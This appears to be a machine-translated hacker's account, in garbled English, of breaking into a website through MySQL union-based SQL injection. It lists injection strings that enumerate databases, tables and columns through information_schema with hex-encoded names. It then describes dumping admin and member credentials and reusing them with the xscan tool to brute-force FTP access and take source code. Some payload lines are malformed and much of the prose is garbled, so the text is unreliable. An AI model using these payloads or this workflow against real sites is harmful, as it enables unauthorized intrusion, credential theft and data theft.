Looks for the injection spot, the judgment field number does not raise.
Under the judgment the jurisdiction, the non-root company, does not have the load_file() jurisdiction, cannot select into outfile, the mysql edition be 5 luckily.
Gain storehouse
and 1=2 union select 1,2,3, database(),5…., 87/*
Or
and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*
and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/*
----------------------------------------------------------------------------------------------
Gain table:
Database transforms hex:admin=0x61646D696E
and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*
. . . Downward explodes in turn
------------------------------------------------------------------------------------------------
Gain field value:
Table admin=0x61646D696E
and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/*
---------------------------------------------------------------------------------------------------
After blowing out the manager account number, discovered that could not register the backstage. Therefore has exploded 10 set of member account numbers. Reorganized under the account number and the password, throws xscan to run the ftp password, 2 minutes later attains the ftp jurisdiction. Only wants the source code, stops work for the day to this. Not technique content!
|